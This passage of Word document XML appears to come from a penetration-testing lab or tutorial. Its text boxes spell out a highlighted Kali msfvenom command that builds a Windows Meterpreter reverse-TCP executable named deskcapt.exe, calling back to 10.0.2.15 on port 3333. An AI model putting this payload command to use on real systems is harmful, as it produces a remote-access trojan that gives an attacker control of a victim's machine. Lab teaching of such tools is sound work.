                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>kali@kali</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">:~$ </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>msfvenom</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 836" o:spid="_x0000_s1202" style="position:absolute;left:17297;top:4267;width:675;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1NtsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvGmqgtRqFNl10aN/FtTbo3m2&#10;xealNFlb/fRGEPY4zMxvmNmiNaW4Ue0KywoG/QgEcWp1wZmC38NPLwbhPLLG0jIpuJODxfyjM8NE&#10;24Z3dNv7TAQIuwQV5N5XiZQuzcmg69uKOHgXWxv0QdaZ1DU2AW5KOYyisTRYcFjIsaKvnNLr/s8o&#10;WMfV8rSxjyYrV+f1cXucfB8mXqnuZ7ucgvDU+v/wu73RCuLR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DU22xQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 837" o:spid="_x0000_s1203" style="position:absolute;left:17800;top:4267;width:34717;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HoLcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNFWyM2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0UwarDksVNjSW0XFJf82&#10;CtZxuzpu7E9fNh+n9eHrMH/fzb1So6dhtQDhafD38H97oxXE01f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kHoLcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>p</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> windows/</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>meterpreter</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>/</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>reverse_tcp</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 838" o:spid="_x0000_s1204" style="position:absolute;left:43891;top:4267;width:1127;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58X8EA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuII7TVWQ2jGK+ECXjgo6u0tzpy3T&#10;3JQm2urXm8WAy8N5z5etKcWDaldYVjAaRiCIU6sLzhRczrtBDMJ5ZI2lZVLwJAfLRbczx0Tbhr/p&#10;cfKZCCHsElSQe18lUro0J4NuaCviwP3a2qAPsM6krrEJ4aaU4yiaSoMFh4YcK1rnlP6d7kbBPq5W&#10;t4N9NVm5/dlfj9fZ5jzzSvV77eoLhKfWf8T/7oNWEE/C2n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efF/BAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>–</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 839" o:spid="_x0000_s1205" style="position:absolute;left:44744;top:4267;width:8651;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LZxMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74LfYXmCN92oUJLoKuIf9Gi1YL09sq9J&#10;aPZtyK4m9tO7hUKPw8z8hlmsOlOJBzWutKxgMo5AEGdWl5wr+LjsRzEI55E1VpZJwZMcrJb93gJT&#10;bVt+p8fZ5yJA2KWooPC+TqV0WUEG3djWxMH7so1BH2STS91gG+CmktMoepMGSw4LBda0KSj7Pt+N&#10;gkNcrz+P9qfNq93tcD1dk+0l8UoNB916DsJT5//Df+2jVhDPEvg9E46AX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ktnExQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>platform</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 11589" o:spid="_x0000_s1206" style="position:absolute;top:6211;width:37200;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3720084,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Cf98UA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPyxR6a3YVKjF1lSAqtQji49LbkB2T&#10;0OxsyK6a/vuuIHibj+8503lvG3GlzteONQwTBYK4cKbmUsPpuHpPQfiAbLBxTBr+yMN8NniZYmbc&#10;jfd0PYRSxBD2GWqoQmgzKX1RkUWfuJY4cmfXWQwRdqU0Hd5iuG3kSKmxtFhzbKiwpUVFxe/hYjV8&#10;b9SuXo736+15s/sxapSn22Ou9dtrn3+CCNSHp/jh/jJx/vAjncD9nXiDnP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oJ/3xQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l3720084,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3720084,175260"/>
                </v:shape>
                <v:rect id="Rectangle 841" o:spid="_x0000_s1207" style="position:absolute;top:6019;width:9137;height:2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Kmv8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5q6yFKrUcRV9OiqoN4ezbMt&#10;Ni+liba7v94sCB6HmfmGmc5bU4oH1a6wrGA4iEAQp1YXnCk4Htb9GITzyBpLy6TglxzMZ93OFBNt&#10;G/6hx95nIkDYJagg975KpHRpTgbdwFbEwbva2qAPss6krrEJcFPKzyj6kgYLDgs5VrTMKb3t70bB&#10;Jq4W5639a7Jyddmcdqfx92HslfrotYsJCE+tf4df7a1WEI+G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ipr/EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>windows</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 842" o:spid="_x0000_s1208" style="position:absolute;left:6873;top:6019;width:1127;height:2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A4yMYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3uqmQUqMrhK0Eo+tCra3R/aZ&#10;hGbfhuw2SfvruwXB4zAz3zCrzWga0VPnassKnmcRCOLC6ppLBefT/ikB4TyyxsYyKfghB5v15GGF&#10;qbYDv1N/9KUIEHYpKqi8b1MpXVGRQTezLXHwrrYz6IPsSqk7HALcNDKOohdpsOawUGFL24qKr+O3&#10;UZAnbfZxsL9D2bx+5pe3y2J3WnilHqdjtgThafT38K190AqSeQz/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jA4yMYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>–</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 843" o:spid="_x0000_s1209" style="position:absolute;left:7711;top:6019;width:5651;height:2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ydU8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNVUqM2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0as0WHNYqLClt4qKS/5t&#10;FKzjdnXc2J++bD5O68PXYf6+m3ulRk/DagHC0+Dv4f/2RiuIZ1P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XydU8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">a x86 </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 844" o:spid="_x0000_s1210" style="position:absolute;left:11948;top:6019;width:25798;height:2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UFJ8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3ppNi0iM2QTRFj22KtjeHtln&#10;Epp9G7Jbk/rruwXB4zAz3zBZMZpWXKh3jWUFz1EMgri0uuFKwfHw9pSAcB5ZY2uZFPySgyKfPGSY&#10;ajvwB132vhIBwi5FBbX3XSqlK2sy6CLbEQfvbHuDPsi+krrHIcBNK1/ieC4NNhwWauxoXVP5vf8x&#10;CrZJt/rc2etQta9f29P7abE5LLxSj9NxtQThafT38K290wqS2Qz+z4QjI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pUFJ8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>lhost</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>=</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">10.0.2.15 </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>lport</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">=3333 </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 845" o:spid="_x0000_s1211" style="position:absolute;left:31348;top:6019;width:675;height:2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mgvMYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNRUuM2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0as0WHNYqLClt4qKS/5t&#10;FKzjdnXc2J++bD5O68PXYf6+m3ulRk/DagHC0+Dv4f/2RiuIpzP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dmgvMYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 846" o:spid="_x0000_s1212" style="position:absolute;left:31851;top:6019;width:5205;height:2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y8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvGmqiNRqFNl10aN/FtTbo3m2&#10;xealNFlb/fRGEPY4zMxvmNmiNaW4Ue0KywoG/QgEcWp1wZmC38NPLwbhPLLG0jIpuJODxfyjM8NE&#10;24Z3dNv7TAQIuwQV5N5XiZQuzcmg69uKOHgXWxv0QdaZ1DU2AW5KOYyisTRYcFjIsaKvnNLr/s8o&#10;WMfV8rSxjyYrV+f1cXucfB8mXqnuZ7ucgvDU+v/wu73RCuLR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Cz7LxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>f</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> exe </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 847" o:spid="_x0000_s1213" style="position:absolute;left:35768;top:6019;width:675;height:2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ebUMYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNRWyM2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0UwarDksVNjSW0XFJf82&#10;CtZxuzpu7E9fNh+n9eHrMH/fzb1So6dhtQDhafD38H97oxXE01f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kebUMYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 848" o:spid="_x0000_s1214" style="position:absolute;left:36271;top:6019;width:1799;height:2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9gPIsEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuII7TRWR2jGK+ECXjgo6u0tzpy3T&#10;3JQm2urXm8WAy8N5z5etKcWDaldYVjAaRiCIU6sLzhRczrtBDMJ5ZI2lZVLwJAfLRbczx0Tbhr/p&#10;cfKZCCHsElSQe18lUro0J4NuaCviwP3a2qAPsM6krrEJ4aaU4yiaSoMFh4YcK1rnlP6d7kbBPq5W&#10;t4N9NVm5/dlfj9fZ5jzzSvV77eoLhKfWf8T/7oNWEE/C2n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fYDyLBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>o</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 11590" o:spid="_x0000_s1215" style="position:absolute;top:7964;width:23881;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2388108,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gD/8kA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPT0vDQBDF74LfYZlCL9JuWlDb2G0RQahoD/1Dex2y&#10;Y5I2Oxt21zT66Z2D4G2GefPe+y1WvWtURyHWng1Mxhko4sLbmksDh/3raAYqJmSLjWcy8E0RVsvb&#10;mwXm1l95S90ulUpMOOZooEqpzbWORUUO49i3xHL79MFhkjWU2ga8irlr9DTLHrTDmiWhwpZeKiou&#10;uy9n4K0+tu+Xc7cut3c+PG5+Dh/plBkzHPTPT6AS9elf/Pe9tlJ/cj8XAMGRGfTyF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MgD/8kAAADeAAAADwAAAAAAAAAAAAAAAACYAgAA&#10;ZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAI4DAAAAAA==&#10;" path="m,l2388108,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2388108,175260"/>
                </v:shape>
                <v:rect id="Rectangle 850" o:spid="_x0000_s1216" style="position:absolute;top:7772;width:19048;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eV+cEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuII7TRWU2jGK+ECXjgo6u0tzpy3T&#10;3JQm2urXm8WAy8N5z5etKcWDaldYVjAaRiCIU6sLzhRczrtBDMJ5ZI2lZVLwJAfLRbczx0Tbhr/p&#10;cfKZCCHsElSQe18lUro0J4NuaCviwP3a2qAPsM6krrEJ4aaU4yiaSoMFh4YcK1rnlP6d7kbBPq5W&#10;t4N9NVm5/dlfj9fZ5jzzSvV77eoLhKfWf8T/7oNWEE/C/H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x3lfnBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>/home/kali/Desktop/</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 851" o:spid="_x0000_s1217" style="position:absolute;left:14325;top:7772;width:878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swYsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5q64FKrUcRV9OiqoN4ezbMt&#10;Ni+liba7v94sCB6HmfmGmc5bU4oH1a6wrGA4iEAQp1YXnCk4Htb9GITzyBpLy6TglxzMZ93OFBNt&#10;G/6hx95nIkDYJagg975KpHRpTgbdwFbEwbva2qAPss6krrEJcFPKzyj6kgYLDgs5VrTMKb3t70bB&#10;Jq4W5639a7Jyddmcdqfx92HslfrotYsJCE+tf4df7a1WEI+G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7MGLEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>deskcapt</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 852" o:spid="_x0000_s1218" style="position:absolute;left:20924;top:7772;width:3944;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uFcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3uqmAUuMrhK0Eo+tCra3R/aZ&#10;hGbfhuw2SfvruwXB4zAz3zCrzWga0VPnassKnmcRCOLC6ppLBefT/ikB4TyyxsYyKfghB5v15GGF&#10;qbYDv1N/9KUIEHYpKqi8b1MpXVGRQTezLXHwrrYz6IPsSqk7HALcNDKOohdpsOawUGFL24qKr+O3&#10;UZAnbfZxsL9D2bx+5pe3y2J3WnilHqdjtgThafT38K190AqSeQz/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muFcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>.exe</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 853" o:spid="_x0000_s1219" style="position:absolute;left:23881;top:7772;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ULjsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNFUuM2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0as0WHNYqLClt4qKS/5t&#10;FKzjdnXc2J++bD5O68PXYf6+m3ulRk/DagHC0+Dv4f/2RiuIZ1P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KULjsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
